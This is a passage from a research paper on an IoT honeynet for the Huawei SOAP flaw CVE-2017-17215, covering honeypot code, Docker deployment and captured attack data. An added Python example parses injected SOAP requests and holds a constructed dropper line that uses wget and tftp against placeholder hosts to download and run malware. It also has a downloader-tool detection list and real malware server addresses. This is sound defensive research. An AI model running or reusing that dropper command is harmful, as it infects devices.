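                self.servers.pop(port, None)
                self._listen(port, banner, desc)
                restarted.append(port)
        return restarted

def probe(host, port, path="/", timeout=2.0):
    """GET one path and return (status, Server header, body); None on connection error or timeout."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        return resp.status, resp.getheader("Server"), resp.read()
    except (OSError, http.client.HTTPException):
        return None
    finally:
        conn.close()
```

For a deployment, pass DEVICES itself to MultiPortHoneypot, bind to 0.0.0.0 instead of 127.0.0.1, and call check_and_restart() from a timer thread at the configured self-check delay and cycle; the tc rate limit applied by Tc.sh still sits in front of the listeners.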

2327-4662 (c) 2019 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information.

E. Honeypot Docker Packaging

To facilitate rapid deployment and migration, and to contain malicious behavior once a honeypot has been compromised, the honeypot must be virtualized and made portable. It is therefore packaged into an easily usable and deployable black box.

Docker is a technology for packaging applications. Its main components are images, containers, and repositories. An image is a file that contains the basic contents of a container in a form the Docker engine can recognize; it can contain whatever the developer needs, such as the operating system, a specific environment, and applications. A container is a running image. The repository stores images. For rapid deployment, the image is streamlined as follows:

1. Optimize the base image. Ubuntu 16.04 is adopted as the base image of the honeypot, and the packages needed by Python 3.6 are integrated into it, so that they do not have to be downloaded at a reduced rate during packaging.
2. Concatenate Dockerfile instructions. Multiple commands are concatenated into one RUN command, which reduces the number of image layers, and unnecessary components are removed to reduce image size.
3. Optimize the build. The image cache is exploited as much as possible, a fixed machine is used for Docker builds, and the large, rarely changing dependent libraries are separated from the frequently modified code of the project itself.
4. Optimize the run command. Suggested (recommended) dependencies are not installed when executing the apt command.

During rapid deployment of the honeynet, the master node issues commands to the master program of each physical host; each physical host connects to the remote image repository, downloads the required honeypot images, and runs them. A hybrid IoT honeynet with multiple nodes and multiple honeypots is thus constructed through communication between the master node and each physical machine, communication among the physical machines, and cooperation among the honeypots inside each physical machine.

IV. EVALUATION

A. Configuration

In this paper, the control center and its program run on a personal computer, and the proposed honeynet is deployed in the cloud. Table V presents the specific software environments and configurations.

TABLE V
TEST ENVIRONMENT

Software type | Configuration
HoneyWeb host operating system | Ubuntu 18.04
Honeynet host dependent environment | Docker, qemu
Project development languages | Python, vue, node, shell
Database | MySQL, heidisql
Test host | Win10 Professional
Browser | Google Chrome

B. Evaluation of Honeypots

Table VI presents the functional test of the honeypot. The test shows that the IoT honeypot faithfully simulates the real IoT device services and can handle unknown requests. It also implements the self-check and restart functions with a degree of fault tolerance and robustness, and it provides a reliable underlying environment for the system. We can conclude from Table VI that the honeypot runs normally after start-up and provides the simulated SOAP service of an IoT device. After the honeypot core service is killed with the kill command, the honeypot daemon finds during the regular self-check that the program is not running and automatically restarts the core.

TABLE VI
HONEYPOT TEST INSTANCES

Instance description | Expected results | Actual results
Scan device response header information | Returns the banner information of the IoT device; attackers get the same response as from real IoT devices | Normal
Wget requested device file | Honeypot records the request, returns the requested file and saves the log; requester downloads the device file locally | Normal
Request a resource path that does not exist | Honeypot records the request content and responds that the resource does not exist | Normal
Use POC injection directive | Honeypot records the injection code and returns a response; attacker gets the prompt that the device upgrade is successful | Normal
Download instructions with POC injection sample | Honeypot successfully analyzes the download instructions and downloads the malicious samples; attacker gets the prompt that the device upgrade is successful | Normal
Inject the firmware honeypot with POC code | Firmware successfully executes the malicious instructions | Normal
Wget request for a multi-port honeypot device file | Honeypot returns a different banner based on the requested path and port number; attackers get the same response as from real IoT devices | Normal
Kill a process with the kill command | The honeypot self-check program detects service availability at regular intervals; it finds the process terminated and restarts it automatically | Normal

C. Evaluation of Honeynet

Two honeypots deployed at 138.68.166.134 in the USA and at 159.89.42.105 in Canada operated steadily and collected many attacks over the week between November 30, 2018 and December 6, 2018, as shown in Table VII.

TABLE VII
SAMPLE SERVER INFORMATION

IP | Location | Operator
46.17.47.82 | Moscow, Russia | justhost.ru
46.183.218.247 | Latvia | dataclub.eu
68.183.49.185 | New York, New York, USA | digitalocean.com
91.236.239.91 | Hauts-de-France, Valenciennes, France | firstheberg.com
128.199.137.201 | Singapore | digitalocean.com
176.32.33.123 | Moscow, Russia | justhost.ru
185.10.68.127 | Bucharest, Romania | flokinet.is
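The rows "Use POC injection directive" and "Download instructions with POC injection sample" of Table VI describe the step that yields the server list of Table VII and the hashes of Table VIII: the recorded SOAP body is examined for the injected shell, the download instructions in it are turned into URLs, and each fetched sample is hashed. The Python below is an added illustration of that step and not the paper's sample download module. The request body and the payload bytes are constructed (the element names are placeholders, the addresses come from the RFC 5737 documentation ranges, and the file names are those of Table VIII), and the fetch function is injected so that nothing touches the network.

```python
import hashlib
import html
import re
import shlex
from urllib.parse import urlsplit

DOWNLOADERS = {"wget", "curl", "tftp"}                       # download primitives typical of IoT droppers
URL_RE = re.compile(r"\b(?:https?|ftp|tftp)://[^\s'\"<>;|&)]+", re.I)
TEXT_RE = re.compile(r">([^<]+)<")                           # text content of every XML element
SEPARATORS = re.compile(r"\s*(?:;|&&|\|\||\||\n)\s*")      # shell command separators

def injected_shell(body):
    """Element texts of a recorded request that mention a downloader, with $( ) and backticks stripped."""
    found = []
    for text in TEXT_RE.findall(body):
        text = html.unescape(text).strip()
        if any(tool in text for tool in DOWNLOADERS):
            found.append(re.sub(r"^\$\(|\)$|`", "", text))
    return found

def tftp_url(argv):
    """tftp has no URL form; rebuild one from 'tftp -g -r FILE [-l LOCAL] HOST' or 'tftp HOST -c get FILE'."""
    remote, hosts, i = None, [], 1
    while i < len(argv):
        if argv[i] == "-r" and i + 1 < len(argv):
            remote, i = argv[i + 1], i + 2
        elif argv[i] == "-c" and i + 2 < len(argv) and argv[i + 1] == "get":
            remote, i = argv[i + 2], i + 3
        elif argv[i] == "-l" and i + 1 < len(argv):
            i += 2
        elif argv[i].startswith("-") or argv[i].isdigit():  # other flags, or a bare port number
            i += 1
        else:
            hosts.append(argv[i])
            i += 1
    return [f"tftp://{hosts[0]}/{remote}"] if remote and hosts else []

def download_urls(shell):
    """URLs fetched by each wget/curl/tftp command in one injected shell line, in order, deduplicated."""
    urls = []
    for cmd in SEPARATORS.split(shell):
        try:
            argv = shlex.split(cmd)
        except ValueError:                                   # unbalanced quotes: fall back to whitespace
            argv = cmd.split()
        argv = [a for a in argv if a.rsplit("/", 1)[-1] != "busybox"]   # '/bin/busybox wget' -> 'wget'
        if not argv:
            continue
        tool = argv[0].rsplit("/", 1)[-1]
        if tool == "tftp":
            urls.extend(tftp_url(argv))
        elif tool in DOWNLOADERS:
            urls.extend(URL_RE.findall(cmd))
    return list(dict.fromkeys(urls))

def sample_record(url, data):
    """What the sample download module keeps per payload: source server plus content hashes."""
    return {"url": url, "server": urlsplit(url).hostname, "size": len(data),
            "md5": hashlib.md5(data).hexdigest(), "sha256": hashlib.sha256(data).hexdigest()}

def analyse_request(body, fetch):
    """One recorded request -> download URLs, the servers behind them, and hashed samples.
    fetch(url) returns the payload bytes or None; a deployment injects a real, sandboxed downloader."""
    urls = list(dict.fromkeys(u for shell in injected_shell(body) for u in download_urls(shell)))
    samples = []
    for url in urls:
        data = fetch(url)
        if data is not None:
            samples.append(sample_record(url, data))
    return {"urls": urls, "servers": sorted({urlsplit(u).hostname for u in urls}), "samples": samples}

# Constructed request body in the shape of a recorded SOAP injection: the element names are placeholders,
# the addresses are RFC 5737 documentation ranges, the file names are taken from Table VIII.
SAMPLE_REQUEST = (
    '<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
    '<u:Action xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewValue>'
    "$(cd /tmp; /bin/busybox wget http://192.0.2.10:8080/mips.bushido -O m; chmod 777 m; ./m;"
    " tftp -g -r ixa 198.51.100.7; chmod +x ixa; ./ixa)"
    "</NewValue></u:Action></s:Body></s:Envelope>"
)
# Constructed stand-ins for what those servers would serve; nothing is fetched from the network here.
FAKE_SAMPLES = {"http://192.0.2.10:8080/mips.bushido": b"abc",
                "tftp://198.51.100.7/ixa": b"The quick brown fox jumps over the lazy dog"}
```

In a deployment, fetch would be a downloader that writes into a quarantine directory with a size cap and never executes what it retrieves; the server field of each record is what feeds a table of the kind shown in Table VII, and the md5 field is what is looked up on VirusTotal for Table VIII.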


Fig. 5. Analysis for captured scan behaviors (chart by source country: Russia, India, Japan, France, USA, UK; figure not reproduced in this text)

Fig. 6. Analysis for captured inject behaviors (chart by source country: Russia, India, Japan, France, USA, Italy; figure not reproduced in this text)

A total of 332 distinct IPs were observed scanning and injecting the honeypot. Fig. 5 shows the source countries of the scan behaviors; most scans originate from Japan. Fig. 6 shows the distribution of countries for injection behaviors; most injection attacks originate from the US. Nine IPs found in the records are identified as suspected sample download centers or C2 servers, located in different countries. Apart from these IPs, the honeypot also captured a threat domain named cnc.arm7plz.xyz. Fig. 7 shows the distribution of these servers; most are deployed in the USA. The honeypots downloaded several IoT malicious samples from these servers. Three of the four samples had not been flagged by VirusTotal (VT) at the time of capture, indicating that the honeypots can capture the latest threats to the IoT, which is of high scientific and engineering value. Table VIII presents the specific information on the malicious samples.

Fig. 7. Server distribution of malicious samples (chart by country: Russia, Japan, USA, UK, Italy; figure not reproduced in this text)

TABLE VIII
MALICIOUS IOT SAMPLES CAPTURED BY HONEYPOT

Sample name | MD5 hash | Flagged by VT
NEixu378 | 3ead70762dea459c9eaa890ad3fb5c67 | Yes
ixa | 0995b3d7b7de8b6b2c3fd68dd0a69318 | No
gvv | 65751698335401d479c646a4e2a4fafb | No
mips.bushido | 7556a023c0db73c72ea2e1e7355a30b9 | No

V. CONCLUSION

On the basis of the CVE-2017-17215 vulnerability exploited by large-scale botnets, we developed a medium-high interaction honeypot that implements SOAP service interaction, log recording, sample download, and service self-check. For requests that the honeypot cannot process, a high-interaction honeypot based on real firmware is designed. Moreover, to expand the processing capability of the honeynet, a multi-port honeypot is developed using the SOAP service ports most exposed in 2018, simulating different types of IoT devices. Finally, rapid deployment of the honeynet is achieved by packaging the honeypot as a Docker image. The honeynet system has been in stable operation for nearly half a year in 2019, providing a large number of logs, malicious samples, and other materials.

Because vulnerabilities are time-sensitive, IoT vulnerabilities, security incidents, and hacker attacks must be tracked and analyzed on an ongoing basis. As for the honeynet, the intelligence, automation, and efficiency of the system require further strengthening.


Weizhe Zhang is currently a professor in the School of Computer Science and Technology at Harbin Institute of Technology, China, and director of the Cyberspace Security Research Center, Pengcheng Laboratory, Shenzhen, China. His research interests are primarily in cyberspace security, cloud computing, and high-performance computing. He has published more than 130 academic papers in journals, books, and conference proceedings. He is a senior member of the IEEE and a lifetime member of the ACM.

Bin Zhang received his Ph.D. degree from the Department of Computer Science and Technology, Tsinghua University, China, in 2012. He worked as a postdoctoral researcher at the Nanjing Telecommunication Technology Institute from 2014 to 2017. He is now a researcher in the Cyberspace Security Research Center of Peng Cheng Laboratory. He has published more than 30 papers in refereed international conferences and journals. His current research interests focus on network anomaly detection, Internet architecture and its protocols, network traffic measurement, and information privacy security.

Ying Zhou received a bachelor's degree in computer science and technology from Dalian University of Technology in 2016 and a master's degree in computer science and technology from Harbin Institute of Technology in 2019. She has been working at PengCheng Laboratory, Shenzhen, China, since 2019.

Hui He is a Ph.D. supervisor in the School of Computer Science and Technology, Harbin Institute of Technology. She is a member of the IEEE, ACM, and CCF. She conducts research in network and information technology, big data processing and analysis, and mobile network computing. She has published more than fifty scientific papers. She has completed many projects, including National High Technology Research and Development Program and National Science Foundation projects, and has won two second prizes of the Provincial Science and Technology Progress Awards.

Zeyu Ding received a bachelor's degree from Harbin Engineering University in 2017 and a master's degree from Harbin Institute of Technology in 2019. His research direction is cyberspace security.

